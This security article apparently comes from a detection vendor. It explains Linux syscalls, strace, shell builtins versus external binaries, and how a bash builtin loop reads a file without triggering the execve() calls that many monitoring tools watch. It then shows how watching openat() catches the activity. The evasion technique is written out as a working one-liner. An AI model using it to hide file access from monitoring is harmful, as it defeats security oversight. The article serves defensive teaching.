As it turns out, there are several syscalls that we could be using to open our file: open(), creat(), openat(), and openat2(), each of which have a somewhat different set of behaviors. For example, the main difference between open() and openat() is that the path for the file being opened by openat() is considered to be relative to the current working directory, unless an absolute path is specified. Depending on the operating system being used, the application in question, and what it is doing relative to the file, we may see different variations of the open syscalls taking place. If we’re only watching open(), we may not see the activity that we’re looking for at all.

Generally, security tools watch for the execve() syscall, which is one syscall indicating process execution taking place (there are others of a similar nature such as execveat(), clone(), and fork()). This is a safer thing to watch from a resource perspective, as it doesn’t take place as often as some of the other syscalls. This is also where most of the interesting activity is taking place. Many of the EDR-like tools watch this syscall specifically. As we’ll see here shortly, this is not always the best approach. 

There aren’t any bad syscalls we can watch, they’re all just tools. Syscalls don’t hack systems, people with syscalls hack systems. There are many syscalls to watch and a lot of different ways they can be used. On Linux, one of the common methods of interfacing with the OS is through system shells, such as bash and zsh. 

NOTE:If you want to see a complete* list of syscalls, take a gander at the documentation on syscall man page here. This list also shows where syscalls are specific to certain architectures or have been deprecated. *for certain values of complete

Examining Syscalls

Now that we have some ideas of what syscalls are, let’s take a quick look at some of them in action. On Linux, one of the primary tools for examining syscalls as they happen is strace. There are a few other tools we can use for this (including the open source version of Sysdig), which we will discuss at greater length in future articles. The strace utility allows us to snoop on syscalls as they’re taking place, which is exactly what we want when we’re trying to get a better view of what exactly is happening when a command executes. Let’s try this out:

1 – We’re going to make a new directory to perform our test in, then use touch to make a file in it. This will help minimize what we get back from strace, but it will still return quite a bit.

5 – Then, we’ll run strace and ask it to execute the ls command. Bear in mind that this is the output of a very small and strictly bounded test where we aren’t doing much. With a more complex set of commands, we would see many, many more syscalls. 

7 – Here, we can see the execve() syscall and the ls command being executed. This particular syscall is often the one monitored for by various detection tools as it indicates program execution. Note that there are a lot of other syscalls happening in our example, but only one execve()

8 – From here on down, we can see a variety of syscalls taking place in order to support the ls command being executed. We won’t dig too deeply into the output here, but we can see various libraries being used, address space being mapped, bytes being read and written, etc.

$ mkdir test
$ cd test/
$ touch testfile

$ strace ls

execve("/usr/bin/ls", ["ls"], 0x7ffcb7920d30 /* 54 vars */) = 0
brk(NULL)                               = 0x5650f69b7000
arch_prctl(0x3001 /* ARCH_??? */, 0x7fff2e5ae540) = -1 EINVAL (Invalid argument)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f07f9f63000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=61191, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 61191, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f07f9f54000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libselinux.so.1", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=166280, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 177672, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f07f9f28000
mprotect(0x7f07f9f2e000, 139264, PROT_NONE) = 0
mmap(0x7f07f9f2e000, 106496, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6000) = 0x7f07f9f2e000
mmap(0x7f07f9f48000, 28672, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x20000) = 0x7f07f9f48000
mmap(0x7f07f9f50000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x27000) = 0x7f07f9f50000
mmap(0x7f07f9f52000, 5640, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f07f9f52000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P\237\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0 \0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0"..., 48, 848) = 48
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0 =\340\2563\265?\356\25x\261\27\313A#\350"..., 68, 896) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=2216304, ...}, AT_EMPTY_PATH) = 0
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 2260560, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f07f9c00000
mmap(0x7f07f9c28000, 1658880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x28000) = 0x7f07f9c28000
mmap(0x7f07f9dbd000, 360448, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1bd000) = 0x7f07f9dbd000
mmap(0x7f07f9e15000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x214000) = 0x7f07f9e15000
mmap(0x7f07f9e1b000, 52816, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f07f9e1b000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpcre2-8.so.0", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=613064, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 615184, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f07f9e91000
mmap(0x7f07f9e93000, 438272, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f07f9e93000
mmap(0x7f07f9efe000, 163840, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6d000) = 0x7f07f9efe000
mmap(0x7f07f9f26000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x94000) = 0x7f07f9f26000
close(3)                                = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f07f9e8e000
arch_prctl(ARCH_SET_FS, 0x7f07f9e8e800) = 0
set_tid_address(0x7f07f9e8ead0)         = 877628
set_robust_list(0x7f07f9e8eae0, 24)     = 0
rseq(0x7f07f9e8f1a0, 0x20, 0, 0x53053053) = 0
mprotect(0x7f07f9e15000, 16384, PROT_READ) = 0
mprotect(0x7f07f9f26000, 4096, PROT_READ) = 0
mprotect(0x7f07f9f50000, 4096, PROT_READ) = 0
mprotect(0x5650f62f3000, 4096, PROT_READ) = 0
mprotect(0x7f07f9f9d000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7f07f9f54000, 61191)           = 0
statfs("/sys/fs/selinux", 0x7fff2e5ae580) = -1 ENOENT (No such file or directory)
statfs("/selinux", 0x7fff2e5ae580)      = -1 ENOENT (No such file or directory)
getrandom("\x9a\x10\x6f\x3b\x21\xc0\xe9\x56", 8, GRND_NONBLOCK) = 8
brk(NULL)                               = 0x5650f69b7000
brk(0x5650f69d8000)                     = 0x5650f69d8000
openat(AT_FDCWD, "/proc/filesystems", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0444, st_size=0, ...}, AT_EMPTY_PATH) = 0
read(3, "nodev\tsysfs\nnodev\ttmpfs\nnodev\tbd"..., 1024) = 421
read(3, "", 1024)                       = 0
close(3)                                = 0
access("/etc/selinux/config", F_OK)     = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=5712208, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 5712208, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f07f9600000
close(3)                                = 0
ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0
ioctl(1, TIOCGWINSZ, {ws_row=48, ws_col=143, ws_xpixel=0, ws_ypixel=0}) = 0
openat(AT_FDCWD, ".", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
newfstatat(3, "", {st_mode=S_IFDIR|0775, st_size=4096, ...}, AT_EMPTY_PATH) = 0
getdents64(3, 0x5650f69bd9f0 /* 3 entries */, 32768) = 80
getdents64(3, 0x5650f69bd9f0 /* 0 entries */, 32768) = 0
close(3)                                = 0
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}, AT_EMPTY_PATH) = 0
write(1, "testfile\n", 9testfile
)               = 9
close(1)                                = 0
close(2)                                = 0
exit_group(0)                           = ?
+++ exited with 0 +++


Strace has a considerably larger set of capabilities than what we touched on here. A good starting place for digging into it further can be found in the documentation

Now that we’ve covered syscalls, let’s talk a bit about system shells. 

Linux System Shell 101

System shells are interfaces that allow us to interact with an operating system. While shells can be graphical in nature, most of the time when we hear the word shell, it will be in reference to a command-line shell accessed through a terminal application. The shell interprets commands from the user and passes them onto the kernel via, you guessed it, syscalls. We can use the shell to interact with the resources we discussed earlier as being available via syscalls, such as networks, files, and hardware components. 

On any given Linux installation, there will be one or more shells installed. On a typical server or desktop installation, we’ll likely find a small handful of them installed by default. On a purposefully stripped-down distribution, such as those used for containers, there may only be one. 

On most distributions, we can easily ask about the shell environment that we are operating in: 

1 – Reading /etc/shells should get us a list of which shells are installed on the system. Here we can see sh, bash, rbash, dash, and zsh as available shells. 

NOTE: The contents of /etc/shells isn’t, in all cases, the complete list of shells on the system. It’s a list of which ones can be used as login shells. These are generally the same list, but YMMV.

15 – We can easily check which shell we’re currently using by executing echo $0. In this case, we’re running the bash shell.

19 – Switching to another shell is simple enough. We can see that zsh is present in our list of shells and we can change to it by simply issuing zsh from our current shell. 

21 – Once in zsh, we’ll ask which shell we are in again, and we can see it is now zsh.

25 – We’ll then exit zsh, which will land us back in our previous shell. If we check which shell we’re in again, we can see it is bash once again. 

$ cat /etc/shells

# /etc/shells: valid login shells
/bin/sh
/bin/bash
/usr/bin/bash
/bin/rbash
/usr/bin/rbash
/usr/bin/sh
/bin/dash
/usr/bin/dash
/bin/zsh
/usr/bin/zsh

$ echo $0

/bin/bash

$ zsh

% echo $0

zsh

% exit

$ echo $0

/bin/bash

As we walk through the rest of our discussion, we’ll be focusing on the bash shell. The various shells have somewhat differing functionality, but are usually similar, at least in broad strokes. Bash stands for “Bourne Again SHell” as it was designed as a replacement for the original Bourne shell. We’ll often find the Bourne shell on many systems also. It’s in the list we looked at above at /bin/sh

All this is great, you might say, but we were promised syscall evasion. Hold tight, we have one more background bit to cover, then we’ll talk about those parts. 

Shell Builtins vs. External Binaries

When we execute a command in a shell, it can fall into one of several categories:

  • It can be a program binary external to our shell (we’ll call it a binary for short). 
  • It can be an alias, which is a sort of macro pointing to another command or commands. 
  • It can be a function, which is a user defined script or sequence of commands. 
  • It can be a keyword, a common example of which would be something like ‘if’ which we might use when writing a script. 
  • It can be a shell builtin, which is, as we might expect, a command built into the shell itself. We’ll focus primarily on binaries and builtins here. 

Identifying External Binaries

Let’s take another look at the ls command:

1 – We can use the which command to see the location of the command being executed when we run la. We’ll use the -a switch so it will return all of the results. We can see there are a couple results, but this doesn’t tell us what ls is, just where it is.

6 – To get a better idea of what is on the other end of ls when we run it, we can use the type command. Again, we’ll add the -a switch to get all the results. Here, we can see that there is one alias and two files in the filesystem behind the ls command.

7 – First, the alias will be evaluated. This particular alias adds the switch to colorize the output of ls when we execute it. 

8 – After this, there are two ls binaries in the filesystem. Which of these is executed depends on the order of our path. 

11 – If we take a look at the path, we can see that /usr/local/bin appears in the path before /bin, so /usr/local/bin/ls is the command being executed by the ls alias when we type ls into our shell. The final piece of information we need to know here is what type of command this particular ls is.

15 – We can use the file command to dig into ls. File tells us that this particular version of ls is a 64bit ELF binary. Circling all the way back around to our discussion on types of commands, this makes ls an external binary. 

21 – Incidentally, if we look at the other ls located in /bin, we will find that it is an identical file with an identical hash. What is this sorcery? If we use file to interrogate /bin, we’ll see that it’s a symlink to bin. We’re seeing the ls binary twice, but there is really only one copy of the file. 

$ which -a ls
/usr/bin/ls
/bin/ls


$ type -a ls
ls is aliased to `ls --color=auto'
ls is /usr/bin/ls
ls is /bin/ls

$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/sna
p/bin:/snap/bin

$ file /usr/bin/ls
/usr/bin/ls: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically
 linked, interpreter /lib64/ld-linux-x86-64.so.2,
 BuildID[sha1]=897f49cafa98c11d63e619e7e40352f855249c13, for GNU/Linux 3.2.0,
 stripped

$ file /bin
/bin: symbolic link to usr/bin

Identifying Shell Builtins

We briefly mentioned that a shell builtin is built into the binary of the shell itself. The builtins available for any given shell can vary quite widely. Let’s take a quick look at what we have available in bash:

1 – The compgen command is one of those esoteric command line kung-fu bits. In this case, we’ll use it with the -b switch, which effectively says “show me all the shell builtins.” We’ll also do a little formatting to show the output in columns and then show a count of the results.

2 – We can see some common commands in the output, like cd, echo, and pwd (also note the compgen command we just ran). When we execute these, we don’t reach out to any other binaries inside the filesystem, we do it all inside of the bash shell already running. 

17 – We should also note that just because one of these commands is in the builtins list for our shell, it can also be elsewhere. If we use the type command again to inquire about echo, which is in our builtins list, type will tell us it is a shell builtin, but we will also see a binary sitting in the filesystem. If we run echo from bash, we will get the builtin, but if we run it from another shell without a builtin echo, we may get the one from the filesystem instead. 

$ compgen -b | pr -5 -t; echo "Count: $(compgen -b | wc -l)"
.	      compopt	    fc		  popd		suspend
:	      continue	    fg		  printf	            test
[	      declare	    getopts	  pushd	times
alias	      dirs	    hash	  pwd		trap
bg	      disown	    help	              read		true
bind	      echo	    history	  readarray	type
break	      enable	    jobs	              readonly	typeset
builtin	      eval	    kill	              return	            ulimit
caller	      exec	    let		  set		umask
cd	      exit 	    local	              shift		unalias
command export	    logout	  shopt		unset
compgen  false	    mapfile	  source	wait
complete
Count: 61

$ type -a echo
echo is a shell builtin
echo is /usr/bin/echo
echo is /bin/echo


It’s also important to note that this set of builtins are specific to the bash shell, and other shells may be very different. Let’s take a quick look at the builtins for zsh.

1 - Zsh doesn’t have compgen, so we’ll need to get the data we want in a different manner. We’ll access the builtins associative array, which contains all the builtin commands of zsh, then do some formatting to make the results a bit more sane and put the output into columns, lastly getting a count of the results.

% print -roC5 -- ${(k)builtins}; echo "Count: ${(k)#builtins}"

-                           compquote     fg                  pushln         umask
.                           compset         float              pwd             unalias
:                           comptags       functions      r                   unfunction
[                           comptry          getln             read             unhash
alias                    compvalues    getopts         readonly      unlimit
autoload              continue          hash             rehash        unset
bg                        declare           history           return          unsetopt
bindkey                dirs                 integer          sched          vared
break                   disable            jobs              set               wait
builtin                   disown            kill                setopt           whence
bye                       echo               let                shift              where
cd                         echotc            limit             source          which
chdir                     echoti             local            suspend       zcompile
command            emulate          log               test               zf_ln
compadd              enable            logout          times           zformat
comparguments  eval                noglob          trap              zle
compcall              exec               popd            true               zmodload
compctl                exit                 print             ttyctl             zparseopts
compdescribe     export             printf            type              zregexparse
compfiles             false               private         typeset         zstat
compgroups         fc                   pushd          ulimit            zstyle
Count: 105
NOTE:
Print what now? “% print -roC5 — ${(k)builtins}; echo “Count: ${(k)#builtins}” can be a bit difficult to parse. Here’s a breakdown of what each part does:
%: This indicates that we’re (probably) in the Zsh shell.
print: This is a command in Zsh used to display text.
-roC5: These are options for the print command.
-r: Don’t treat backslashes as escape characters.
-o: Sort the printed list in alphabetical order.
C5: Format the output into 5 columns.
–: This signifies the end of the options for the command. Anything after this is treated as an argument, not an option.
${(k)builtins}: This is a parameter expansion in Zsh.
${…}: Parameter expansion syntax in Zsh.
(k): A flag to list the keys of an associative array.
builtins: Refers to an associative array in Zsh that contains all built-in commands.
echo “Count: ${(k)#builtins}”: This part of the command prints the count of built-in commands.
echo: A command to display the following text.
“Count: “: The text to be displayed.
${(k)#builtins}: Counts the number of keys in the builtins associative array, which in this context means counting all built-in commands in Zsh.
In simple terms, this command lists all the built-in commands available in the Zsh shell, formats them into five columns, and then displays the total count of these commands.

We can see here that there are over 40 more builtins in zsh than there are in bash. Many of them are the same as what we see in bash, but the availability of builtin commands is something to validate when working with different shells. We’ll continue working with bash as it’s one of the more commonly used shells that we might encounter, but this is certainly worth bearing in mind. 

Now that we know a bit about the shell and shell builtins, let’s look at how we can use these for syscall evasion.

Syscall Evasion Techniques Using Bash Builtins

As we mentioned earlier, many security tools that monitor syscalls monitor for process execution via the execve() syscall. From a certain tool design perspective, this is a great solution as it limits the number of syscalls we need to watch and should catch most of the interesting things going on. For example, let’s use cat to read out the contents of a file and watch what happens with strace:

1 – First, we’ll echo a bit of data into the test file we used earlier so we have something to play with. Then, we’ll cat the file and we can see the output with the file contents.

5 – Now let’s do this again, but this time we’ll watch what happens with strace. We’ll spin up a new bash shell which we will monitor with strace. This time, we’ll also add the -f switch so strace will monitor subprocesses as well. This will result in a bit of extra noise in the output, but we need this in order to get a better view of what is happening as we’re operating in a new shell. Note that strace is now specifying the pid (process id) at the beginning of each syscall as we’re watching multiple processes.

6 – Here we have the execve() syscall taking place for the bash shell we just started. We can see the different subprocesses taking place as bash starts up.

34 – Now we’re dropped back to a prompt, but still operating inside the shell being monitored with strace. Let’s cat the file again and watch the output. 

37 – We can see the syscall for our cat here, along with the results of the command. This is all great, right? We were able to monitor the command with strace and see its execution. We saw the exact command we ran and the output of the command. 

$ echo supersecretdata >> testfile
$ cat testfile 
supersecretdata

$ strace -f -e trace=execve bash
execve("/usr/bin/bash", ["bash"], 0x7ffee6b6c710 /* 54 vars */) = 0
strace: Process 884939 attached
[pid 884939] execve("/usr/bin/lesspipe", ["lesspipe"], 0x55aa1d8a3090 /* 54 vars */) = 0
strace: Process 884940 attached
[pid 884940] execve("/usr/bin/basename", ["basename", "/usr/bin/lesspipe"],
0x55983907af68 /* 54 vars */) = 0
[pid 884940] +++ exited with 0 +++
[pid 884939] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
 si_pid=884940, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 884941 attached
strace: Process 884942 attached
[pid 884942] execve("/usr/bin/dirname", ["dirname", "/usr/bin/lesspipe"],
0x559839087108 /* 54 vars */) = 0
[pid 884942] +++ exited with 0 +++
[pid 884941] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884942, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 884941] +++ exited with 0 +++
[pid 884939] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884941, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 884939] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884939,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 884943 attached
[pid 884943] execve("/usr/bin/dircolors", ["dircolors", "-b"], 0x55aa1d8a2d10 /* 54 vars
*/) = 0
[pid 884943] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884943,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
$ cat testfile

strace: Process 884946 attached
[pid 884946] execve("/usr/bin/cat", ["cat", "testfile"], 0x55aa1d8a9520 /* 54 vars */) = 0
supersecretdata
[pid 884946] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884946,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---

$ exit
exit
+++ exited with 0 +++


Let’s try being sneakier about things by using a little shell scripting of a bash builtin and see what the results are: 

1 – We’ll start a new bash shell and watch it with strace, the same as we did previously.

3 – Here’s the execve() syscall for the bash shell, just as we expected.

31 – And we’re dropped back to the prompt. This time, instead of using cat, we’ll use two of the bash builtins to frankenstein a command together and replicate what cat does:

while IFS= read -r line; do echo "$line"; done < testfile

This uses the bash builtins read and echo to process our file line by line. We use read to fetch each line from testfile into the variable line, with the -r switch to ensure any backslashes are read literally. The IFS= (internal field separator) preserves leading and trailing whitespaces. Then, echo outputs each line exactly as it’s read.

35 – Zounds! We’re dropped back to the prompt with no output from strace at all.

$ strace -f -e trace=execve bash

execve("/usr/bin/bash", ["bash"], 0x7fff866fefc0 /* 54 vars */) = 0
strace: Process 884993 attached
[pid 884993] execve("/usr/bin/lesspipe", ["lesspipe"], 0x5620a56bf090 /* 54 vars */) = 0
strace: Process 884994 attached
[pid 884994] execve("/usr/bin/basename", ["basename", "/usr/bin/lesspipe"],
0x558950f6cf68 /* 54 vars */) = 0
[pid 884994] +++ exited with 0 +++
[pid 884993] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=884994, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 884995 attached
strace: Process 884996 attached
[pid 884996] execve("/usr/bin/dirname", ["dirname", "/usr/bin/lesspipe"],
0x558950f79108 /* 54 vars */) = 0
[pid 884996] +++ exited with 0 +++
[pid 884995] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=884996, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 884995] +++ exited with 0 +++
[pid 884993] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=884995, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 884993] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884993,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 884997 attached
[pid 884997] execve("/usr/bin/dircolors", ["dircolors", "-b"], 0x5620a56bed10 /* 54 vars
*/) = 0
[pid 884997] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884997,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
$ while IFS= read -r line; do echo "$line"; done < testfile

Supersecretdata

$ 

If we can’t see the activity while monitoring for process execution, how do we find it?

Looking for Syscalls in All the Right Places

The problem we were encountering with not seeing the sneaky bash builtin activity was largely due to looking in the wrong place. We couldn’t see anything happening with execve() because there was nothing to see. In this particular case, we know a file is being opened, so let’s try one of the open syscalls. In this particular case, we’re going to cheat and jump directly to looking at openat(), but it could very well be any of the open syscalls we discussed earlier. 

1 – We’ll start up the strace-monitored bash shell again. This time, our filter is based on openat() instead of execve().

2 – Note that we see a pretty different view of what is taking place when bash starts up this time since we’re watching for files being opened. 

72 – Back at the prompt, we’ll run our sneaky bit of bash script to read the file. 

73 – Et voilà, we see the openat() syscall for our file being opened and the resulting output. 

$ strace -f -e trace=openat bash
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libtinfo.so.6", O_RDONLY|O_CLOEXEC) =
3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/dev/tty", O_RDWR|O_NONBLOCK) = 3
openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache",
O_RDONLY) = 3
openat(AT_FDCWD, "/etc/nsswitch.conf", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/terminfo/x/xterm-256color", O_RDONLY) = 3
openat(AT_FDCWD, "/etc/bash.bashrc", O_RDONLY) = 3
openat(AT_FDCWD, "/home/user/.bashrc", O_RDONLY) = 3
openat(AT_FDCWD, "/home/user/.bash_history", O_RDONLY) = 3
strace: Process 984240 attached
[pid 984240] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 984240] openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6",
O_RDONLY|O_CLOEXEC) = 3
[pid 984240] openat(AT_FDCWD, "/usr/bin/lesspipe", O_RDONLY) = 3
strace: Process 984241 attached
[pid 984241] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 984241] openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6",
O_RDONLY|O_CLOEXEC) = 3
[pid 984241] openat(AT_FDCWD, "/usr/lib/locale/locale-archive",
O_RDONLY|O_CLOEXEC) = 3
[pid 984241] +++ exited with 0 +++
[pid 984240] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=984241, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 984242 attached
strace: Process 984243 attached
[pid 984243] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 984243] openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6",
O_RDONLY|O_CLOEXEC) = 3
[pid 984243] openat(AT_FDCWD, "/usr/lib/locale/locale-archive",
O_RDONLY|O_CLOEXEC) = 3
[pid 984243] +++ exited with 0 +++
[pid 984242] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=984243, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 984242] +++ exited with 0 +++
[pid 984240] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=984242, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 984240] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=984240,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 984244 attached
[pid 984244] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 984244] openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6",
O_RDONLY|O_CLOEXEC) = 3
[pid 984244] openat(AT_FDCWD, "/usr/lib/locale/locale-archive",
O_RDONLY|O_CLOEXEC) = 3
[pid 984244] openat(AT_FDCWD,
"/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
[pid 984244] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=984244,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
openat(AT_FDCWD, "/usr/share/bash-completion/bash_completion", O_RDONLY) = 3
openat(AT_FDCWD, "/etc/init.d/",
O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
openat(AT_FDCWD, "/etc/bash_completion.d/",
O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
openat(AT_FDCWD, "/etc/bash_completion.d/apport_completion", O_RDONLY) = 3
openat(AT_FDCWD, "/etc/bash_completion.d/git-prompt", O_RDONLY) = 3
openat(AT_FDCWD, "/usr/lib/git-core/git-sh-prompt", O_RDONLY) = 3
openat(AT_FDCWD, "/dev/null", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3
openat(AT_FDCWD, "/home/user/.bash_history", O_RDONLY) = 3
openat(AT_FDCWD, "/home/user/.bash_history", O_RDONLY) = 3
openat(AT_FDCWD, "/home/user/.inputrc", O_RDONLY) = -1 ENOENT (No such file or
directory)
openat(AT_FDCWD, "/etc/inputrc", O_RDONLY) = 3

$ while IFS= read -r line; do echo "$line"; done < testfile
openat(AT_FDCWD, "testfile", O_RDONLY)  = 3
supersecretdata

We can catch the activity from the shell builtins, in most cases, but it’s a matter of looking in the right places for the activity we want. It might be tempting to think we could just watch all the syscalls all the time, but doing so quickly becomes untenable. Our example above produces somewhere around 50 lines of strace output when we are filtering just for openat(). If we take the filtering off entirely and watch for all syscalls, it balloons out to 1,200 lines of output. 

This is being done inside a single shell with not much else going on. If we tried to do this across a running system, we would see exponentially more in the brief period of time before it melted down into a puddle of flaming goo from the load. In other words, there really isn’t any reasonable way to watch all the syscall activity all the time. The best we can do is to be intentional with what we choose to monitor. 

Conclusion

This exploration into syscall evasion using bash shell builtins illuminates just a fraction of the creative and subtle ways in which system interactions can be manipulated to bypass security measures. Security tools that solely focus on process execution for monitoring are inherently limited in scope and a more nuanced and comprehensive approach to monitoring system activity is needed to provide a better level of security.

The simple example we put together for replicating the functionality of cat dodged this entirely and allowed us to read the data from our file while flying completely under the radar of tools that were only looking for process execution. Unfortunately, this is the tip of the iceberg. 

